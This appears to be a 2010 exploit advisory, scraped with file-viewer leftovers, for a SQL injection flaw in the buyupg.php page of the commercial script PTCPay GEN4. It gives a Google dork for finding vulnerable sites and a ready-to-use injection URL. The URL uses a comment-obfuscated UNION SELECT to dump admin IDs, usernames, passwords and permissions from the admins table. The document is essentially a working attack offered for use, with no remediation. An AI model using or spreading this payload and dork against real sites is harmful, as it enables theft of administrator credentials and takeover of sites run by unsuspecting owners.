22 lines
No EOL
829 B
Text
22 lines
No EOL
829 B
Text
=====================================================
|
|
PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability
|
|
=====================================================
|
|
|
|
# Exploit Title:
|
|
# Date: 28.06.2010
|
|
# Author: Dark.Man > dark.kopat@gmail.com
|
|
# Thanks To: Diq3N , SkyTurk , ByHuCRe , HeuRiSTiC , th3spy , 3KStyL3 , WatchFul
|
|
# Homepage: http://www.Root-Secure.Org/
|
|
# Software Link: http://www.ptcpay.com/
|
|
# Version: PTCPay GEN4
|
|
# Price: $149.99
|
|
# Google dork : "Powered by GeN4"
|
|
# Category: SQL Injection
|
|
|
|
---- Exploit ----
|
|
|
|
Step 1 - Register The Site
|
|
|
|
Step 2 - Go to link :
|
|
http://www.site.com/buyupg.php?upg=2/**/aNd/**/1=0/**/unIon
|
|
SeleCT/**/1,2,3,4,5,6,7,CONCAT_WS(CHAR(32,58,32),aId,aUsername,aPassword,aPermissions),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/admins |